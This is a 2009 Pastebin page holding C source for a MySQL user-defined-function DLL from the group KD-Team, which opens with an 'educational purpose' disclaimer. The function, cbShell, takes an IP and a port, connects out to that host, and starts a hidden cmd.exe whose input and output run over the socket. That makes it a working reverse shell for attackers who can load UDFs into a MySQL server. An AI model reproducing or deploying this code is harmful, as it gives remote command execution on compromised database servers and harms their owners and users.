daily pastebin goal
86%
SHARE
TWEET

DiabloHorn

a guest Nov 9th, 2009 273 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  3. +This is a little Disclaimer for if you havn't read the one on our site.           +
  4. +The tools and tutorials KD-Team develops and publishes are only ment for          +
  5. +educational purpose only.WE DO NOT encourage the use of this tools and            +
  6. +tutorials for mailicious purpose.We learned a lot during the development of them  +
  7. +so we hope you also learn and don't just use it without any brains.               +
  8. +We take completly NO responsability for any damage caused by them nor             +
  9. +are we or our isp responsible for what you do with them.                          +
  10. +Greetz: KD-Team                                                                   +
  11. +http://www.kd-team.com                                                            +
  12. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  13. */
  14.  
  15. #include <winsock2.h>
  16. #include <windows.h>
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20. #include <mysql.h>
  21.  
  22. //You can play with this if you don't want to include mysql.h etc then just defining everything by hand
  23. //enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
  24.  
  25. //typedef struct st_udf_args
  26. //{
  27. //      unsigned int arg_count; /* Number of arguments */
  28. //      enum Item_result *arg_type; /* Pointer to item_results */
  29. //      char **args; /* Pointer to argument */
  30. //      unsigned long *lengths; /* Length of string arguments */
  31. //      char *maybe_null; /* Set to 1 for all maybe_null args */
  32.         //Page 18;
  33. //} UDF_ARGS;
  34.  
  35.  
  36. //typedef struct st_udf_init
  37. //{
  38. //      char maybe_null; /* 1 if function can return NULL */
  39. //      unsigned int decimals; /* for real functions */
  40. //      unsigned long max_length; /* For string functions */
  41. //      char *ptr; /* free pointer for function data */
  42. //      char const_item; /* 0 if result is independent of arguments */
  43. //} UDF_INIT;
  44.  
  45. extern "C"  {
  46. __declspec (dllexport) my_bool cbShell_init(UDF_INIT *initid, UDF_ARGS *args, char *message);
  47. __declspec (dllexport) int cbShell(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error, char *result, unsigned long *length);
  48.  
  49. }
  50.  
  51. my_bool cbShell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
  52. {
  53.         if( args->arg_count != 2 )
  54.         {
  55.                 strcpy(message,"cbShell()usage: select cbShell(\"ip\",\"port\")");
  56.                 return 1;
  57.         }
  58.  
  59.         if ( args->arg_type[0] != STRING_RESULT || args->arg_type[1] != STRING_RESULT)
  60.         {
  61.     strcpy(message,"cbShell() requires a valid ip and port");
  62.     return 1;
  63.         }
  64.  
  65.  
  66.         return 0;
  67. };
  68.  
  69.  
  70. int cbShell(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error, char *result, unsigned long *length)
  71. {
  72.  
  73. //*error = 1;
  74. *is_null = 1;
  75.  
  76.         int sock;
  77.     struct sockaddr_in cbAddr;
  78.     WSADATA wsaData;
  79.         STARTUPINFO si;
  80.         PROCESS_INFORMATION pi={0};
  81.         char comspec[MAX_PATH];
  82.         unsigned short cbPort;
  83.     char *cbIp;
  84.  
  85.         cbIp = args->args[0];
  86.         cbPort = atoi(args->args[1]);
  87.  
  88. //starting up wsa
  89.     if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0)
  90.     {
  91.         //printf("WSAStartup() failed");
  92.         //exit(1);
  93.     }
  94. //Make shure it's WSASocket()
  95.     if ((sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
  96.         {
  97.         //printf("Socket Failed\n");
  98.                 WSACleanup();
  99.                 //exit(1);
  100.         }
  101.  
  102. //filling the struct
  103.     memset(&cbAddr, 0, sizeof(cbAddr));
  104.     cbAddr.sin_family      = AF_INET;
  105.         cbAddr.sin_addr.s_addr = inet_addr(cbIp);
  106.     cbAddr.sin_port        = htons(cbPort);
  107.         // Establish the connection to the echo server
  108.     if (connect(sock, (struct sockaddr *) &cbAddr, sizeof(cbAddr)) < 0)
  109.         {
  110.         //printf("connect() failed\n");
  111.                 closesocket(sock);
  112.                 WSACleanup();
  113.                 //exit(1);
  114.         }
  115.  
  116.  
  117.  
  118.  
  119. //Setting up the startupinfo etc to make shure cmd get's a both way traffic
  120.                 memset(&si,0,sizeof(si));
  121.                 GetStartupInfo(&si);
  122.                 si.cb = sizeof(si);
  123.                 si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  124.                 si.wShowWindow = SW_HIDE;
  125.                 si.hStdInput = (HANDLE)sock;
  126.                 si.hStdOutput = (HANDLE)sock;
  127.                 si.hStdError =(HANDLE)sock;
  128. //getting cmd.exe a bit more fancier then hardcoding it.
  129.                 if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
  130.                 {
  131.                         //printf("Environment var failed\n");
  132.                         closesocket(sock);
  133.                         //exit(1);
  134.                 }
  135.  
  136.  
  137.                 if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
  138.                 {
  139.                         //printf("process creation failed\n");
  140.                         closesocket(sock);
  141.                         CloseHandle(pi.hProcess);
  142.                         CloseHandle(pi.hThread);
  143.                 }
  144.  
  145.                 WaitForSingleObject(pi.hProcess, INFINITE);
  146.                 CloseHandle(pi.hProcess);
  147.                 CloseHandle(pi.hThread);
  148.                 closesocket(sock);
  149.  
  150.  
  151. return 0;
  152.  
  153.  
  154.  
  155. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top